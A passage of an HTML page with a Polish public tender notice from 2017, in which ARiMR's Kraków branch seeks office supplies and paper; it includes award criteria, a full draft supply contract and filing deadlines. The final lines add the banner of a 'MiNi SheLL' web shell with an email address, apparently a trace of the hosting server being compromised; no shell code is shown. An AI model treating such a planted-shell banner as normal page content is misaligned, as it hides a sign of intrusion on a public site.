jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani">Nie</span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu">Nie</span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa">licytacja wieloetapowa</span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"></span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani">Nie</span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia">Umowa NrZawarta w dniu ... maja 2017 r. w Krakowie pomiędzy:Agencją Restrukturyzacji i Modernizacji Rolnictwa z siedzibą w Warszawie przy Al. Jana Pawła II 70, reprezentowaną przez:Adama Ślusarczyka - Dyrektora Małopolskiego Oddziału Regionalnego ARiMR, Danutę Grzybczyk - Kierownika Biura Finansowo Księgowego Małopolskiego Oddziału Regionalnego ARiMRzwaną w dalszej części umowy ,,Zamawiającym"a................................. z siedzibą w ............................ wpisaną/ym do Rejestru Przedsiębiorców, pod numerem ...................... zgodnie z odpisem aktualnym z tegoż rejestru z dnia .......................... stanowiącym Załącznik nr 1 do niniejszej umowy, reprezentowaną/ym przez ..........................., zwaną w dalszej części umowy ,,Wykonawcą" zawartą w trybie przetargu nieograniczonego zgodnie z przepisami Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych ( tekst jednolity: Dz. U. z 2015, poz. 2164 ze zm.), o następującej treści:§ 1Przedmiot Umowy1.	Wykonawca zobowiązuje się do sprzedaży oraz dostarczenia a Zamawiający do odebrania i zapłaty ceny za materiały biurowe i papier (dalej zwane ,,materiałami biurowymi") w ilości i rodzaju wskazanym w Załączniku Nr 2.2.	Przedmiot umowy zostanie dostarczony na koszt i ryzyko Wykonawcy do siedzib Biur Powiatowych Zamawiającego, a następnie przez Wykonawcę wniesiony do pomieszczeń magazynowych wskazanych przez Zamawiającego. Zamawiający odmówi odbioru przedmiotu umowy w sytuacji, gdy Wykonawca nie zapewni wniesienia przedmiotu umowy do pomieszczeń magazynowych, o których mowa ust 2.3.	Zestawienie materiałów, które mają zostać dostarczone do poszczególnych Biur Powiatowych Zamawiającego w województwie małopolskim stanowi Załącznik nr 3 do niniejszej umowy4.	Przedmiot umowy zostanie dostarczony w sposób umożliwiający natychmiastowe sprawdzenie stanu ilościowego i jakościowego, w szczególności poprzez zapewnienie właściwego opakowania.§ 2Określenie ceny przedmiotu1.Łączną cenę przedmiotu umowy, o którym mowa w § 1 ust. 1 strony ustalają na kwotę netto ................... (słownie złotych: ........................................) plus należny podatek od towarów i usług w kwocie ..................... zł (słownie złotych: ..................................................).2.Na łączną cenę przedmiotu umowy, o którym mowa w § 1 ust. 1 składają się ceny jednostkowe netto poszczególnych rodzajów materiałów biurowych/papieru ustalone w Załączniku NR 2 pomnożone przez określone przez Zamawiającego ilości materiałów biurowych plus należny podatek od towarów i usług.§ 3Warunki odbioru1.	Przedmiot umowy zostanie dostarczony w terminie czterech tygodnia od dnia zawarcia niniejszej umowy, a w przypadku pudeł archiwizacyjnych w terminie sześciu tygodni od dnia zawarcia umowy.2.	Zamawiający dopuszcza w terminach wskazanych w ust 1 dostawę przedmiotu umowy partiami.3. Wydanie dostarczonego przedmiotu umowy zostanie potwierdzone protokołem odbioru, podpisanym przez obie strony. § 4Płatności1. Strony ustalają, że zapłata za przedmiot umowy nastąpi na podstawie faktury wystawionej po dostarczeniu materiałów biurowych. Podstawę do wystawienia faktury stanowi podpisany przez obie strony protokół odbioru, o którym mowa w § 3 ust 3.2. Faktura, o której mowa w ust. 1 będzie obejmować dostarczoną ilość materiałów biurowych po cenach jednostkowych netto powiększonych o należny podatek od towarów i usług ustalonych w Załączniku Nr 2 do umowy.3. Zapłata nastąpi w formie przelewu na rachunek bankowy Wykonawcy, wskazany na fakturze, o której mowa w ust. 1, w terminie 21 dni od dnia otrzymania faktury przez Zamawiającego. Za dzień spełnienia świadczenia przez Zamawiającego przyjmuje się dzień obciążenia jego rachunku bankowego.4. Błędnie wystawiona faktura lub brak podpisanego bez zastrzeżeń protokołu odbioru spowoduje naliczenie ponownego 21-dniowego terminu płatności od momentu dostarczenia prawidłowo wystawionej faktury lub poprawionego albo brakującego protokołu stanowiącego podstawę do uiszczenia zapłaty.5. Faktura będzie wystawiona na: Agencja Restrukturyzacji i Modernizacji Rolnictwa, Al. Jana Pawła II 70, 00-175 Warszawa, REGON: 010613083, NIP: 526-19-33-940, zaś doręczona na adres: Małopolski Oddział Regionalny Agencji Restrukturyzacji i Modernizacji Rolnictwa, ul. Lubicz 25, 31-503 Kraków.§ 5Usuwanie wad przedmiotu umowy1. W przypadku, gdy dostarczone materiały biurowe będą miały wady lub dostarczone zostaną w ilości mniejszej niż zamówione Wykonawca zobowiązuje się do wymiany wadliwych materiałów biurowych na wolne od wad lub dostarczenia ich w zamówionej ilości w terminie 7 dni od daty zgłoszenia reklamacji.2. Zamawiający może zgłaszać wady materiałów biurowych w terminie 1 miesiąca od dnia ich stwierdzenia, zachowując uprawnienie wskazane w ust. 1.§ 6Kary umowne1. Wykonawca zapłaci Zamawiającemu kary umowne w następujących przypadkach: 1) z tytułu nie dostarczenia materiałów biurowych w terminie ustalonym w § 3 ust. 1, w wysokości 10% wartości brutto asortymentu, którego dotyczy opóźnienie, za każdy dzień opóźnienia. 2)w przypadku nie usunięcia braków ilościowych oraz nie dokonania wymiany wadliwych materiałów biurowych na wolne od wad w terminie 7 dni od daty pisemnego zgłoszenia reklamacji, w wysokości 10% wartości brutto brakującego lub wadliwego asortymentu, za każdy dzień opóźnienia.2. Zamawiający może odstąpić od umowy w przypadku przekroczenia przez Wykonawcę terminów, o których mowa w § 3 ust 1 i § 5 ust 1 powyżej pięciu dni roboczych.2. W przypadku odstąpienia od umowy przez Wykonawcę z jego winy lub przez Zamawiającego z winy Wykonawcy zapłaci on Zamawiającemu karę umowną w wysokości 25% łącznej ceny przedmiotu umowy netto, o której mowa w § 2 ust 1.3. Kary umowne płatne są w terminie 7 dni od dnia wezwania przez Zamawiającego lub mogą zostać potrącone z wynagrodzenia należnego Wykonawcy.4. Jeżeli wysokość szkody przekroczy wysokość kwot uzyskanych kar umownych, Zamawiający zastrzega sobie prawo dochodzenia odszkodowania uzupełniającego na zasadach określonych w Kodeksie Cywilnym.§ 7Rozstrzygnięcie1. Ewentualne spory wynikłe w związku z realizacja postanowień niniejszej umowy, strony będą starały się rozstrzygnąć w drodze negocjacji i porozumienia.2. W razie braku porozumienia spory będą podlegać rozstrzygnięciu przez Sąd Powszechny właściwy dla siedziby Zamawiającego.§ 8Odstąpienie od umowy1.	Zamawiający ma prawo odstąpić od całości umowy lub jej części w przypadku wystąpienia okoliczności i zdarzeń, których Zamawiający nie przewidywał i których skutkom nie mógł zapobiec (vis maior).2.	W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie miesiąca od powzięcia wiadomości o powyższych okolicznościach. 3.	W razie wystąpienia przypadku, o którym mowa w ust 1 lub 2 Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy.Postanowienia końcowe§ 9Strony dopuszczają możliwość zmian niniejszej umowy z zastrzeżeniem uwarunkowań, o których mowa w art. 144 ust 1 i 2 ustawy Prawo zamówień publicznych.§ 101.	Wykonawca zobowiązuje się do nie zatrudniania w wykonaniu niniejszej umowy w charakterze pracowników i podwykonawców osób zatrudnionych u Zamawiającego, pod rygorem zapłaty kary umownej w wysokości 15% łącznej ceny przedmiotu umowy netto, o której mowa w § 2 ust 1 i odstąpienia przez Zamawiającego od umowy.2.	Wykonawca zobowiązuje się do zachowania w poufności wszelkich informacji dotyczących Zamawiającego, które nabył w związku z realizacją niniejszej umowy, poza przypadkami wyraźnego przyzwolenia Zamawiającego lub sytuacji, gdy ujawnienie takich informacji następuje z mocy przepisów prawa.3.	Wykonawca zobowiązuje się do realizacji umowy w sposób, który zapobiegać będzie występowaniu incydentów zagrażających bezpieczeństwu informacji wrażliwych znajdujących się w posiadaniu Zamawiającego.4.	Za incydent zagrażający bezpieczeństwu informacji wrażliwych uważane jest w szczególności: wejście do pomieszczeń stref ograniczonego dostępu bez zgody Zamawiającego lub bez nadzoru ze strony pracowników Zamawiającego, ujawnienie, wyniesienie, uszkodzenie lub zniszczenie dokumentów zawierających dane wrażliwe, uszkodzenie, wyniesienie lub zniszczenie elementów infrastruktury technicznej, urządzeń lub innego mienia ruchomego stanowiącego własność Zamawiającego lub osób trzecich.5.	W przypadku wystąpienia jakiegokolwiek incydentu związanego z naruszeniem bezpieczeństwa informacji wrażliwych lub dotyczącego mienia Zamawiającego, w okolicznościach, o których mowa w ust 2-4, Wykonawca zapłaci Zamawiającemu karę umowną w wysokości 1 000 zł za każde takie zdarzenie6.	§11W sprawach nieuregulowanych niniejszą umową mają zastosowanie odpowiednie postanowienia kodeksu cywilnego oraz ustawy Prawo zamówień publicznych.§ 12Wszelkie zmiany postanowień niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.§ 13Umowa może być rozwiązana w każdym czasie za porozumieniem stron.§ 14Umowa sporządzona w czterech jednobrzmiących egzemplarzach jeden dla Wykonawcy i trzy dla Zamawiającego.Zamawiający Wykonawca</span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14">Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.</span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zamawiający przewiduje możliwość zmiany zawartej umowy w następujących przypadkach:- działania siły wyższej lub wystąpienia stanu wyższej konieczności,- wystąpienia warunków atmosferycznych całkowicie uniemożliwiających wykonanie przedmiotu zamówienia w wyznaczonych terminach,- niezależnych od wykonawcy okoliczności, które uniemożliwiają dostawę całości lub części asortymentu w terminie wskazanym przez Zamawiającego,zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe,- zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia,- omyłek pisarskich lub błędów rachunkowych,- mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,- jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego,- innych zmian korzystnych dla Zamawiającego, w tym polegających na zamianie elementów zamówienia na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-05-24 </span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Oferta musi zostać sporzadzona w języku polskim</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">Oferty należy złożyć w siedzibie Małopolskiego Oddziału Regionalnego ARiMR, ul. Lubicz 25, 31-503 Kraków</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com